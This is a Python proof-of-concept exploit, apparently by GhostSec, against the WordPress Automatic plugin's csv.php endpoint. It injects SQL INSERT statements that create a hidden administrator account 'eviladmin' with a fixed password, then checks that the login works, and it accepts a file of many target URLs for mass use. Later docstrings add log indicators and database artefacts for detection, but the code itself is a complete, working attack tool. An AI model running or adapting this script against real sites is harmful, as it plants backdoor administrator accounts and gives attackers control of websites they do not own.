import requests
import sys
import pyfiglet
import urllib3

# Silences the per-request TLS warning; every request below is sent with verify=False.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ANSI escape sequences used for the console output.
RED = "\033[91m"
GREEN = "\033[92m"
BOLD = "\033[1m"
RESET = "\033[0m"


def print_banner() -> None:
    """Print the figlet banner and the tool's title line to stdout."""
    ascii_art = pyfiglet.figlet_format("Ghost_Exploit", font="standard")
    print(f"{BOLD}{RED}{ascii_art}{RESET}")
    print(f"{BOLD}{GREEN}💀 Remote Code Execution in Wordpress automatic Plugin POC | By GhostSec 💀{RESET}\n")


def print_usage() -> None:
    """Print the command-line usage text to stdout.

    The wording here describes the invocation forms; the argument handling
    that is actually applied lives in the ``__main__`` block at the bottom.
    """
    print(f"{BOLD}{RED}Usage: python exploit.py targets.txt OR python exploit.py http://example.com{RESET}")
    print(f"{BOLD}{RED}Options:{RESET}")
    print(f"{BOLD}{GREEN} Example python RCE_Exploit.py -u http://testphp.vulnweb.com/{RESET}")
    print(f"{BOLD}{RED} targets.txt File containing target URLs, one per line.{RESET}")
    print(f"{BOLD}{RED} http://example.com A single target URL to exploit.{RESET}")


def makeRequest(payload: str, hash: str, url: str) -> requests.Response:
    """POST one form-encoded request to ``url`` and return the raw response.

    Args:
        payload: sent verbatim as the ``q`` form field.
        hash: sent as the ``integ`` form field. Both call sites pass a fixed
            32-hex-character string; how the server uses it is not visible in
            this file. The parameter name shadows the ``hash`` builtin.
        url: full request URL; its authority component is copied into the
            ``Host`` header.

    Returns:
        The ``requests.Response``. The status code is not checked here.

    Detection note: the fixed Firefox/115 User-Agent together with a form body
    carrying the fields ``q``, ``auth`` and ``integ`` and ``Connection: close``
    is the request shape that web-server or WAF logs of this tool would show.
    """
    # "scheme://host/path".split('/', 3)[2] is the host part; an input with no
    # "//" makes this raise IndexError.
    host = url.split('/', 3)[2]
    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    # 'auth' is a single NUL byte on every request; 'integ' is the caller's per-query value.
    data = {'q': payload, 'auth': b'\0', 'integ': hash}
    # Certificate verification is disabled, so a self-signed or mismatched cert is accepted.
    return requests.post(url, data=data, headers=headers, verify=False)


def check_login(url: str) -> bool:
    """Attempt a form login at ``<url>/wp-login.php`` as ``eviladmin`` / ``admin``.

    Returns:
        True when the substring ``'Dashboard'`` appears in the response body,
        which the caller reads as a successful login. Neither the status code
        nor the final redirect target is inspected.

    Detection note: a POST to ``/wp-login.php`` with ``log=eviladmin`` is the
    login-side indicator of this tool in access logs.
    """
    login_url = url + '/wp-login.php'
    payload = {
        'log': 'eviladmin',
        'pwd': 'admin',
        'wp-submit': 'Log In',
        'redirect_to': url + '/wp-admin/',
        'testcookie': '1'
    }
    response = requests.post(login_url, data=payload, verify=False)
    return 'Dashboard' in response.text


def exploit(target: str) -> None:
    """Run the two-request sequence against one target and print the outcome.

    Both requests go to ``<target>/wp-content/plugins/wp-automatic/inc/csv.php``.
    The first sends an INSERT into ``wp_users`` creating the login ``eviladmin``;
    the second sends an INSERT into ``wp_usermeta`` that sets that user's
    ``wp_capabilities`` to administrator. Only the first response is examined
    (by substring tests); the second response is discarded, so the
    "Exploit completed" lines are printed regardless of whether the second
    insert succeeded — the ``check_login`` call afterwards is the only check of
    the resulting state.

    Incident-response note: the artefacts this leaves in a site's database are
    a ``wp_users`` row with ``user_login`` ``eviladmin``, ``user_email``
    ``eviladmin@gmail.com``, ``user_url`` ``http://127.0.0.1:8000`` and
    ``user_registered`` ``2024-04-30 16:26:43``, plus a ``wp_usermeta`` row
    with ``meta_key`` ``wp_capabilities`` for that user's ID. The table names
    are hard-coded with the default ``wp_`` prefix.
    """
    url = target + '/wp-content/plugins/wp-automatic/inc/csv.php'
    print(f"{BOLD}{GREEN}[+] Creating user eviladmin on {target}{RESET}")
    response = makeRequest(
        "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')",
        "09956ea086b172d6cf8ac31de406c4c0",
        url)
    # Response substrings the script treats as "the query was rejected".
    if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
        print(f"{BOLD}{RED}[!] Error in the payload on {target}{RESET}")
        return
    # The script treats a body without "DATE" as the endpoint not having processed the query.
    if "DATE" not in response.text:
        print(f"{BOLD}{RED}[!] Not vulnerable: {target}{RESET}")
        return
    print(f"{BOLD}{GREEN}[+] Giving eviladmin administrator permissions on {target}{RESET}")
    # Return value deliberately unused by the original author; nothing here verifies this insert.
    makeRequest(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
        "bd98494b41544b818fa9f583dadfa2bb",
        url)
    print(f"{BOLD}{GREEN}[+] Exploit completed on {target}!{RESET}")
    print(f"{BOLD}{GREEN}[+] Administrator created: eviladmin:admin{RESET}")
    if check_login(target):
        print(f"{BOLD}{GREEN}[+] Login successful for eviladmin on {target}!{RESET}")
    else:
        print(f"{BOLD}{RED}[!] Login failed for eviladmin on {target}.{RESET}")


def load_targets(file_path: str) -> list[str]:
    """Return the lines of ``file_path`` as a list.

    Lines are not stripped or filtered, so blank lines come back as empty
    strings. Raises ``FileNotFoundError`` when the path does not exist
    (handled by the caller).
    """
    with open(file_path, 'r') as file:
        return file.read().splitlines()


if __name__ == "__main__":
    print_banner()
    # No argument, or '-h' as the first argument: show usage and exit with status 0.
    if len(sys.argv) < 2:
        print_usage()
        sys.exit()
    if sys.argv[1] == '-h':
        print_usage()
        sys.exit()
    targets: list[str] = []
    if len(sys.argv) == 2:
        # A single argument is always read as a targets file, whatever it looks like.
        file_path = sys.argv[1]
        try:
            targets = load_targets(file_path)
        except FileNotFoundError:
            print(f"{BOLD}{RED}[!] File not found: {file_path}{RESET}")
            sys.exit()
    elif len(sys.argv) == 3:
        # With two arguments the second is taken as a single URL; the first
        # (e.g. the '-u' shown in the usage example) is not inspected.
        target = sys.argv[2]
        targets = [target]
    # Any other argument count leaves ``targets`` empty and the loop is a no-op.
    for target in targets:
        exploit(target)